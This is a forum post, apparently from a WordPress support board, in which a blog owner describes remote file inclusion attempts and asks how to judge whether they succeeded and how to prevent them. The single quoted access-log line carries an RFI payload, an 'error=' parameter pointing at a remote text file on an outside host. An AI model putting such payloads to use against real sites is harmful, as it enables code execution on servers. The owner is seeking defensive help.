Remote File Inclusion (RFI) Attempts
-
Hi, all. I’ve had a bunch of remote file inclusion attempts today – they’ve been hammering away at my domain. I’ve done my best to research the subject but I’m starting from scratch – I knew nothing about it until this evening.
I’m poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404’s, which I’ve been told probably means that specific attempt was not successful. But in some cases I see like the following, with a 200 success indication:
97.106.184.215 – – [29/Apr/2009:20:24:56 -0500] “GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1” 200 7955 “https://blogingenuity.com/2009/04/08/how-to-validating-your…site-the-easy-way-part-2/%20%20/errors.php?error=https://www.sanbokyodan.fr/editor/xml/copyright.txt??” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5”
I don’t know if this means the attempt was successful and I need to start worrying or what.
Could anyone who’s experienced this shed some light on:
1) How can I tell if an attempt was successful and what’s the next step?
2) How can I best prevent the attacks in the first placeThanks in advance.
- The topic ‘Remote File Inclusion (RFI) Attempts’ is closed to new replies.